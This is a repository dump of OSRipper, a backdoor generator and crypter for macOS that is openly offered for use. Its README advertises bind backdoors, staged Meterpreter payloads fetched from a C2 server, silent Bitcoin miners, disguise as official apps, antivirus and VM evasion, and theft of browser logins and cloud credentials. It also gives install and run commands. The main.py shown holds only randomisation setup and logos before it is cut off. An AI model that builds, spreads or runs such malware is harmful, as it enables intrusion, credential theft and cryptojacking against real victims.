├── .gitattributes ├── .github ├── FUNDING.yml └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── LICENSE ├── README.MD ├── SwiftBelt ├── docs └── CODE_OF_CONDUCT.md ├── img ├── OSRipper.png ├── example.png ├── screenshot.png ├── vt.png ├── vt_app.png └── wiki.png ├── main.py ├── obfuscator.py ├── obfuscator2.py ├── requirements.txt ├── ripgrok.py ├── setup.py └── webroot └── readme.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | 4 | custom: https://www.paypal.me/subglitch1 5 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | *.pyc 3 | img/.DS_Store 4 | .DS_Store 5 | build/* 6 | dist/* 7 | ocr.py 8 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 SubGlitch1 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | ![Screenshot](img/OSRipper.png) 2 | ``` 3 | 4 | 5 | ,-.----. ,----.. 6 | ,-.----. ,---,\ / \ / / \ .--.--. ,--, ,--, 7 | \ / \ ,`--.' || : \ / . : / / '. |'. \ / .`| 8 | ; : \| : :| | .\ : . / ;. \ : /`. / ; \ `\ /' / ; 9 | | | .\ :: | '. : |: | . ; / ` ; | |--` `. \ / / .' 10 | . : |: || : || | \ : ; | ; \ ; | : ;_ \ \/ / ./ 11 | | | \ :' ' ;| : . / | : | ; | '\ \ `. \ \.' / 12 | | : . /| | |; | |`-' . | ' ' ' : `----. \ \ ; ; 13 | ; | | ' : ;| | ; ' ; \; / | __ \ \ | / \ \ \ 14 | | | ;\ \ | ': ' | \ \ ', / / /`--' / ; /\ \ \ 15 | : ' | \.' : |: : : ; : / '--'. /./__; \ ; \ 16 | : : :-' ; |.' | | : \ \ .' `--'---' | : / \ \ ; 17 | | |.' '---' `---'.| `---` ; |/ \ ' | 18 | `---' `---` `---' `--` 19 | 20 | 21 | 22 | 23 | 1. Create Bind Backdoor (opens a port on the victim machine and waits for you to connect) 24 | 2. Create Encrypted TCP Meterpreter (can embed in other script) (recommended) 25 | 3. Create Obfuscated file with custom code 26 | ########################################################################################## 27 | Miners 28 | 4. Create a silent BTC miner 29 | 30 | 31 | Please select a module: 32 | 33 | ``` 34 | 35 | [![CodeFactor](https://www.codefactor.io/repository/github/subglitch1/osripper/badge)](https://www.codefactor.io/repository/github/subglitch1/osripper/) 36 | 37 | OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows. 38 | 39 | 40 | # Gen 3 OSRipper backdoor results 41 | https://www.virustotal.com/gui/file/e7e654893cec4e1f1aa76e2bbfa4bb1e0c6a15adf19236845948877e93013aea (py) 42 | https://www.virustotal.com/gui/file-analysis/MjM2MTJiMjI3YTMzM2JjYzExMTJhMzhiMGY4ODQxZjA6MTcwMTcyOTE3MQ== (unix binary) 43 | 44 | # Update 45 | Hey sorry ive been lost in action revently. happy to say this project still works and the binaries are FUD. Will try to continue as planned 46 | 47 | This is the first v0.3 Release. The payloads will now be double staged in order to evade av detection. Please keep in mind that i develop on arch and only test on a few platforms so there are sure to be bugs and you should open issues for them. 48 | Biggest difference to last release is that this project isnt focused on macOS anymore but on all platforms. It also now features a web server on which the staged payload is stored. I will develop this server into a C2 to which data will be pushed from the victim. 49 | With this update the developtment is officially back in progress. 50 | 51 | # Scheme of concept 52 | ``` 53 | +-----------------+ 54 | | Generated | 55 | | Binary | 56 | +-----------------+ 57 | | 58 | | Execute 59 | | 60 | v 61 | +------------------+ 62 | |oBFUSCATED dropper| 63 | +------------------+ 64 | | 65 | | GET request 66 | | 67 | v 68 | +-----------------+ 69 | | | 70 | | C2 SERVER | 71 | | | 72 | +-----------------+ 73 | | 74 | | Download 75 | | 76 | v 77 | +-----------------+ 78 | | Meterpreter | 79 | | Staged Payload| 80 | | (Stage 1) | 81 | +-----------------+ 82 | | 83 | | Download 84 | | 85 | v 86 | +-----------------+ 87 | | C2 Server | 88 | +-----------------+ 89 | | 90 | | Socket 91 | | 92 | v 93 | +-----------------+ 94 | | Meterpreter | 95 | | Staged Payload| 96 | | (Stage 2) | 97 | +-----------------+ 98 | 99 | ``` 100 | 101 | ## Features 102 | - Staged payloads 103 | - FUD (for macOS) 104 | - Cloacks as an official app (Microsoft, ExpressVPN etc) 105 | - Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt) 106 | - Encrypted communications 107 | - Rootkit-like Behaviour 108 | - Every Backdoor generated is entirely unique 109 | - ngrok support 110 | 111 | 112 | ## Description 113 | 114 | Please check the wiki for information on how OSRipper functions (which changes extremely frequently) 115 | 116 | https://github.com/SubGlitch1/OSRipper/wiki 117 | 118 | Here are example backdoors which were generated with OSRipper 119 | 120 | ![Screenshot](img/example.png) 121 | 122 | ![Screenshot](img/vt.png) 123 | 124 | ![Screenshot](img/vt_app.png) 125 | macOS .apps will look like this on vt 126 | 127 | 128 | ## Getting Started 129 | 130 | ### Dependencies 131 | 132 | You need python. If you do not wish to download python you can download a compiled release. 133 | The python dependencies are specified in the requirements.txt file. 134 | 135 | Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners. 136 | 137 | 138 | ## Installing 139 | ### Linux 140 | ```bash 141 | apt install git python -y 142 | git clone https://github.com/SubGlitch1/OSRipper.git 143 | cd OSRipper 144 | sudo python3 setup.py 145 | ``` 146 | ### Windows 147 | ```bash 148 | git clone https://github.com/SubGlitch1/OSRipper.git 149 | cd OSRipper 150 | python3 setup.py 151 | ``` 152 | or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.3 153 | 154 | ### Executing program 155 | Only this 156 | ``` 157 | sudo python3 main.py 158 | ``` 159 | ## Contributing 160 | Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well 161 | 162 | ## Roadmap 163 | ### v0.1 164 | - ✅ Get down detection to 0/26 on antiscan.me 165 | - ✅ Add Changelog 166 | - ✅ Daemonise Backdoor 167 | - ✅ Add Crypter 168 | - ✅ Add More Backdoor templates 169 | - ✅ Get down detection to at least 0/68 on VT (for mac malware) 170 | 171 | ### v0.2 172 | - ✅ Add AntiVM 173 | - [] Implement tor hidden services 174 | - ✅ Add Logger 175 | - ✅ Add Password stealer 176 | - [] Add KeyLogger 177 | - ✅ Add some new evasion options 178 | - ✅ Add SilentMiner 179 | - [] Make proper C2 server 180 | 181 | ### v0.3 182 | - ✅ Add c2 183 | - ✅ Double staged Web delivery 184 | - ⏳ Backdoor pushes data to c2 through POST request 185 | - ❔❓Add post exploitation Modules? (im not sure if this would be helpful) 186 | - ⏳ Add shells with modules instead of python meterpreter 187 | ## Help 188 | 189 | Just open a issue and ill make sure to get back to you 190 | 191 | ## Changelog 192 | * 0.2.1 193 | * OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc. 194 | 195 | 196 | * 0.1.6 197 | * Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared 198 | * 0.1.5 199 | * Added Crypter 200 | * 0.1.4 201 | * Added 4th Module 202 | * 0.1.3 203 | * Got detection on VT down to 0. Made the Proccess invisible 204 | * 0.1.2 205 | * Added 3rd module and listener 206 | * 0.1.1 207 | * Initial Release 208 | 209 | ## License 210 | 211 | MIT 212 | 213 | ## Acknowledgments 214 | 215 | Inspiration, code snippets, etc. 216 | * [htr](https://github.com/htr-tech/PyObfuscate) 217 | * [swiftbelt](https://github.com/cedowens/SwiftBelt) 218 | 219 | 220 | 221 | 222 | ## Disclaimer 223 | I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware. 224 | 225 | 226 | 227 | 228 | 229 | 230 | -------------------------------------------------------------------------------- /SwiftBelt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/SwiftBelt -------------------------------------------------------------------------------- /docs/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | . 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /img/OSRipper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/OSRipper.png -------------------------------------------------------------------------------- /img/example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/example.png -------------------------------------------------------------------------------- /img/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/screenshot.png -------------------------------------------------------------------------------- /img/vt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/vt.png -------------------------------------------------------------------------------- /img/vt_app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/vt_app.png -------------------------------------------------------------------------------- /img/wiki.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SubGlitch1/OSRipper/daf522fded69355581de0f8aada5d3f3f6d3a59d/img/wiki.png -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | ######################################## 2 | #-------OSRIPPER MASTER V0.3.1---------# 3 | ######################################## 4 | 5 | import os 6 | import socket 7 | import shutil 8 | import platform 9 | from urllib import response 10 | import secrets 11 | import string 12 | from ripgrok import get_tunnels 13 | import random 14 | from pickle import GLOBAL 15 | import subprocess 16 | 17 | 18 | 19 | bind = 0 20 | ## RandomVariables 21 | nonce1 = secrets.randbelow(13) 22 | nonce2 = secrets.randbelow(13) 23 | UltimateRandomNumberhigh = random.randint(14, 30) 24 | UltimateRandomNumberlow = secrets.randbelow(nonce1) 25 | UltimateRandomNumberhigh2 = random.randint(14, 30) 26 | UltimateRandomNumberlow2 = secrets.randbelow(nonce2) 27 | sleeptime = secrets.randbelow(12) 28 | VariableRange = random.randint(8, 22) 29 | VariableRange2 = random.randint(8, 22) 30 | VariableRange3 = random.randint(8, 22) 31 | RandomisationNum = random.randint(UltimateRandomNumberlow, UltimateRandomNumberhigh) 32 | RandomisationNum2 = random.randint(UltimateRandomNumberlow2, UltimateRandomNumberhigh2) 33 | c = "".join( 34 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 35 | for i in range(int(VariableRange)) 36 | ) 37 | d = "".join( 38 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 39 | for i in range(int(VariableRange2)) 40 | ) 41 | so = "".join( 42 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 43 | for i in range(int(VariableRange)) 44 | ) 45 | s = "".join( 46 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 47 | for i in range(int(VariableRange2)) 48 | ) 49 | l = "".join( 50 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 51 | for i in range(int(VariableRange3)) 52 | ) 53 | dr = "".join( 54 | secrets.choice(string.ascii_uppercase + string.ascii_lowercase) 55 | for i in range(int(VariableRange3)) 56 | ) 57 | ## jesus christ that was a LOT of random variables (and there are even more hidden away) 58 | reps = False 59 | 60 | 61 | def logo(): 62 | logo1 = """ 63 | 64 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 65 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 66 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 67 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 68 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▓███████████████████████▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░ 69 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓█████████████████████████████████▓▒░░░░░░░░░░░░░░░░░░░░ 70 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓████████████████████████████████████████▓▒░░░░░░░░░░░░░░░░░ 71 | ░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓███████████████████████████████████████████████▒░░░░░░░░░░░░░░ 72 | ░░░░░░░░░░░░░░░░░░░░░░░░▒▓███████████████████████████████████████████████████▒░░░░░░░░░░░░ 73 | ░░░░░░░░░░░░░░░░░░░░░░░▓██████████████████████████████████████████████████▒░░░░░░░░░░░░░░░ 74 | ░░░░░░░░░░░░░░░░░░░░░▓█████████████████████████████████████████████████▓▒░░░░░░░░░░░░░░░░░ 75 | ░░░░░░░░░░░░░░░░░░░░▓█████████████████████████████████████████████████▒░░░░░░░░░░░░░░░░░░░ 76 | ░░░░░░░░░░░░░░░░░░░█████████████████████████████████████████████████▒░░░░░░░░░░░░░░░░░░░░░ 77 | ░░░░░░░░░░░░░░░░░░████████████████████████████████████████████████▓░░░░░░░░░░░░░░░░░░░░░░░ 78 | ░░░░░░░░░░░░░░░░░████████████████████████████████████████████████▒░░░░░░░░░░░░░░░░░░░░░░░░ 79 | ░░░░░░░░░░░░░░░░▓███████████████████████████████████████████████░░░░░░░░░░░░░░░░░░░░░░░░░░ 80 | ░░░░░░░░░░░░░░░▒███████████████▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓███████████▓░░░░░░░░░░░░░░░░░░░░░░░░░░░ 81 | ░░░░░░░░░░░░░░░█████████████▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓██████▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 82 | ░░░░░░░░░░░░░░▓███████████▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓███▓▓▒▒▒▒▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░ 83 | ░░░░░░░░░░░░░░███████████▓▒▒▒▒▓▓▓▒▒▒▓▓▓▓▓▒▒▒▒▒▒▓▓██▓▒▒▓▒▒▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 84 | ░░░░░░░░░░░░░▒██████████▓▒▒▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▓██▓▓▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 85 | ░░░░░░░░░░░░░██████████▓▒▒▓██▓▓▓▓▒▒▒▒▒▒▒▓▓▒▒▓▒▓▓▓▓▓▓▓▒▒▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 86 | ░░░░░░░░░░░░░██████████▒▒▓█▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▓▒▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 87 | ░░░░░░░░░░░░▒████████▓▓▒▒█▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▓▒▒▒▒▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 88 | ░░░░░░░░░░░░▓████████▓▒▒█▓█▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▓▒▒▒▒▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 89 | ░░░░░░░░░░░░▓█████████▓▓█░▓█▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▓▒▓▓▒▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 90 | ░░░░░░░░░░░░▓███████▓▒░▒▒▒▒▒▓█▓▓▓▓▓▓▓▒▒▒▒▒▓▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 91 | ░░░░░░░░░░░░▓██████▒░░▒▓▓▒▒▒▒▒▓▓█▓▓▓▓▓▓▒▒▓▓▓▒▒▒▒▒▒▒▓▓▓▒▒▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 92 | ░░░░░░░░░░░░██████░░░░▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▓▓▒▓▓▓▓▒▒▒▒▒▒▒▓▒▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 93 | ░░░░░░░░░░░░▒████▓░░░░░▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 94 | ░░░░░░░░░░░░▓████▒░░░░░░▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓█████████▓▓▓▓▓▓▓▓█▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 95 | ░░░░░░░░░░░░▒████░░░░░░░░░░░░░░▓▓▓▒▒▒▒▒▒▓▓▓████████▓▓▓▓▓██▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 96 | ░░░░░░░░░░░░▒███▓░░░░░░░░░░░░░░▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓██▓▓▒▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 97 | ░░░░░░░░░░░░░███▓░░░░░░░░░░░░░░▓▓▓▒▒▓▓▒█▒▒▒▒▒▒▓▓▓██▓▓▒▓▓▓▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 98 | ░░░░░░░░░░░░░███▓░░░░░░░░░░░░░░▓▓▓▒▓▓▒▒█▒▓▓▒▒▒▓▓▓▒█▒▓▓▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 99 | ░░░░░░░░░░░░░▒▒▒░░░░░░░░░░░░░░░░▒▓▓▒▒▒▓▓▒█▓▒▓▒▓▓▓░░░▓███▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 100 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▒▒▒▒▒▒▒▒▓▓▒▒░░░███▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 101 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▓▒▒▒▒▒▒▓▓▒░░░░██▓█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 102 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▓▒▒▒▓▓▓░░░░░█▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 103 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▓▓▓▓▓▓▓░░░░░█▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 104 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▓▓▒▒░░░░▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 105 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒░░░░░▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 106 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 107 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 108 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 109 | OSRIPPER v0.2.5 110 | """ 111 | logo2 = """ 112 | ▄▀▀▀▀▄ ▄▀▀▀▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄▀▀▀▄ 113 | █ █ █ █ ▐ █ █ █ █ █ █ █ █ █ █ █ █ ▐ ▄▀ ▐ █ █ █ 114 | █ █ ▀▄ ▐ █▀▀█▀ ▐ █ ▐ ▐ █▀▀▀▀ ▐ █▀▀▀▀ █▄▄▄▄▄ ▐ █▀▀█▀ 115 | ▀▄ ▄▀ ▀▄ █ ▄▀ █ █ █ █ █ ▌ ▄▀ █ 116 | ▀▀▀▀ █▀▀▀ █ █ ▄▀▀▀▀▀▄ ▄▀ ▄▀ ▄▀▄▄▄▄ █ █ 117 | ▐ ▐ ▐ █ █ █ █ █ ▐ ▐ ▐ 118 | ▐ ▐ ▐ ▐ ▐ 119 | 120 | """ 121 | logo3 = """ 122 | 123 | ,-.----. ,----.. 124 | ,-.----. ,---,\ / \ / / \ .--.--. ,--, ,--, 125 | \ / \ ,`--.' || : \ / . : / / '. |'. \ / .`| 126 | ; : \| : :| | .\ : . / ;. \ : /`. / ; \ `\ /' / ; 127 | | | .\ :: | '. : |: | . ; / ` ; | |--` `. \ / / .' 128 | . : |: || : || | \ : ; | ; \ ; | : ;_ \ \/ / ./ 129 | | | \ :' ' ;| : . / | : | ; | '\ \ `. \ \.' / 130 | | : . /| | |; | |`-' . | ' ' ' : `----. \ \ ; ; 131 | ; | | ' : ;| | ; ' ; \; / | __ \ \ | / \ \ \ 132 | | | ;\ \ | ': ' | \ \ ', / / /`--' / ; /\ \ \ 133 | : ' | \.' : |: : : ; : / '--'. /./__; \ ; \ 134 | : : :-' ; |.' | | : \ \ .' `--'---' | : / \ \ ; 135 | | |.' '---' `---'.| `---` ; |/ \ ' | 136 | `---' `---` `---' `--` 137 | 138 | """ 139 | logo4 = """ 140 | .=-.-. _ __ _,.---._ ,-,--. ,-.--, 141 | .-.,.---. /==/_ /.-`.' ,`. ,-.' , - `. ,-.'- _\.--.-. /=/, .' 142 | /==/ ` \|==|, |/==/, - \ /==/_, , - 